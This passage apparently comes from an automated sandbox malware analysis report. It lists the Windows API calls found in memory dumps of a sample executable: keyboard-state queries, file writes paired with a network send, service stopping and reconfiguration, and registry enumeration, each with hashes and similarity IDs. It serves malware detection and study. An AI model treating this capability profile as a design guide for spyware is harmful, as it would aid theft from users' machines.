ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0213A761

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction ID: 5689d8d9e7900173865ffdf87abeb53eadc5a6eab0adec038800141dd894ba3e
Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction Fuzzy Hash: 8E316D72144304FFD711DB94DC84F9BB7EDEB48704F01082AB685D61A0D7B5E948CBA6

Function 02137BCA Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 02137C2C
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 02137C74

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

CloseHandle.KERNEL32(00000000), ref: 02137CB4
MoveFileW.KERNEL32(00000000,00000000), ref: 02137CD1
CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 02137CFC
DeleteFileW.KERNEL32(00000000), ref: 02137D0C

Part of subcall function 02134DFD: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,02134EB0,00000000,00000000,00000000,?,00474EF8,?), ref: 02134E0C
Part of subcall function 02134DFD: SetEvent.KERNEL32(00000000), ref: 02134E2A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID:
API String ID: 1303771098-0
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: e8dea68dfceb885d9e840bc037a7b357d1d35beceeb6b3acb2268f8dd2a711f6
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 1F31B071484345AFD311EB20D89099FB3AAFF98311F00492DF982A2191DB74EE48CFA6

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Function 0214AD74 Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 0214AD83
OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 0214AD9A
CloseServiceHandle.ADVAPI32(00000000), ref: 0214ADA7
ControlService.ADVAPI32(00000000,00000001,?), ref: 0214ADB6

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction ID: f3997d2b082138651e129091791d009704908c8f32453e8f60edbf7ff9eb75ff
Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction Fuzzy Hash: 9911E571980228AF97116F64DC88DFF3B6CDF45A62B000025FD1992091DF248D46EAF5

Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Strings

PkGNG, xrefs: 0044A006

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: PkGNG
API String ID: 1036877536-263838557
Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Function 0217847C Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
_free.LIBCMT ref: 021784B3
_free.LIBCMT ref: 021784DB
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784E8
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
_abort.LIBCMT ref: 021784FA

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: d528a2f614319174248e2b62d58a678416fe3518994fc7a1c6bd12104bf557ab
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 76F081361C4B017EC2153239AC0DB5A257B9BC6722F2B4438FD1A921E0EFA4C841A558

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Function 02143CBC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02143D23
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02143D52
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02143DF2

Strings

xUG, xrefs: 02143EAD
TG, xrefs: 02143E64

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: xUG$TG
API String ID: 3554306468-3109661684
Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction ID: dac7e48ebebbed7af52e62795aac4bce1699dae65b6eb1f94abc96c4930c2c8e
Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction Fuzzy Hash: C0512D72940219AEDB11EB94DC84EEFB77EBF14304F5000A6E519A6190EF746A49CFA1

Function 02172A68 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 02172A6A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 255eff308e04dd290c8b496ca77f5bcd8f83ce52176bae6ad06f70b23dc26805
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: 22410A71A80304AFE734AF78CC44B6ABBBAEBC8710F10856AF915DB680D77195428B80

Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 00442803

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Function 02134F2A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 0213501A
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 0213502E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02135039
CloseHandle.KERNEL32(00000000), ref: 02135042

Strings

PkGNG, xrefs: 02134F33

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: PkGNG
API String ID: 3360349984-263838557
Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction ID: bd4dcdea806eb3d2432f2ff852fae38f19f90cf05f1035f7462d711fe26fe3be
Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction Fuzzy Hash: 61418F71188341AFC716FB60DD54EBFB7AFAF94710F44092DF892921A0EB359D098A62

Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404DD2
CloseHandle.KERNEL32(00000000), ref: 00404DDB

Strings

PkGNG, xrefs: 00404CCC

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: PkGNG
API String ID: 3360349984-263838557
Opcode ID: cbbe2dfce94569549aeaa423c29929df38ce9dd4d80b823a6506e7aee7930c59
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: cbbe2dfce94569549aeaa423c29929df38ce9dd4d80b823a6506e7aee7930c59
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Function 0217369C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ltlbVjClX9.exe,00000104), ref: 021736DC
_free.LIBCMT ref: 021737A7
_free.LIBCMT ref: 021737B1

Strings

C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 021736D3, 021736DA, 02173709, 02173741
`&d, xrefs: 021736E2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$`&d
API String ID: 2506810119-2625664659
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 925f5512e8d3c0761ac61a417e7502bae9adb2e035dbe95f5725b9642ffc83a3
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 5E31A5B1A80658EFDB25DF99DD84D9EBBFDEBC4310F1040A6F81897210D7B09A81DB90

Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ltlbVjClX9.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

`&d, xrefs: 0044347B
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$`&d
API String ID: 2506810119-2625664659
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Function 02181393 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 021813E0
MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 02181469
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 0218147B
__freea.LIBCMT ref: 02181484

Part of subcall function 0217639E: RtlAllocateHeap.NTDLL(00000000,02165523,?), ref: 021763D0

Strings

PkGNG, xrefs: 02181395

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID: PkGNG
API String ID: 2652629310-263838557
Opcode ID: 9e3a2cea2a0fc4b7837225566b856ec3d33dcaedd66ebeb2a8cd5cf62645e3fd
Instruction ID: da4492282863c53613a4b7eb5a9ee7c631c1d74d47a1b3329e3497f48fe32d78
Opcode Fuzzy Hash: 9e3a2cea2a0fc4b7837225566b856ec3d33dcaedd66ebeb2a8cd5cf62645e3fd
Instruction Fuzzy Hash: AD31C172A4020AAFDF24AF64DC84EAE7BA6EF44314F044168EC08D7190E735DD92CFA0

Function 0213A8DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0213A9B4), ref: 0213A912
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0213A9B4), ref: 0213A921
Sleep.KERNEL32(00002710,?,?,?,0213A9B4), ref: 0213A94E
CloseHandle.KERNEL32(00000000,?,?,?,0213A9B4), ref: 0213A955

Strings

XQG, xrefs: 0213A907

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction ID: 95918eb6acbb93f4ad05cc590159d275e15076d21130dd22bc65c2d71ac0a453
Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction Fuzzy Hash: A9110A306C0740EEE633AB6498D9B2E7B5FEF45316F410928E2C66B591C7955884C719

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Function 0214D776 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0214D7C2
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0214D7DD
GetLastError.KERNEL32 ref: 0214D7E7

Strings

MsgWindowClass, xrefs: 0214D78D
0, xrefs: 0214D792

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 589d7e43a27a6a66915d7c659b56d9c24a17926dfe72b967bef32a5cac421813
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 6E01E5B1D04219ABDB00DFA9ECC4DEFBBBDEB05259B40053AF914A6240EB7599058AA0

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D55B
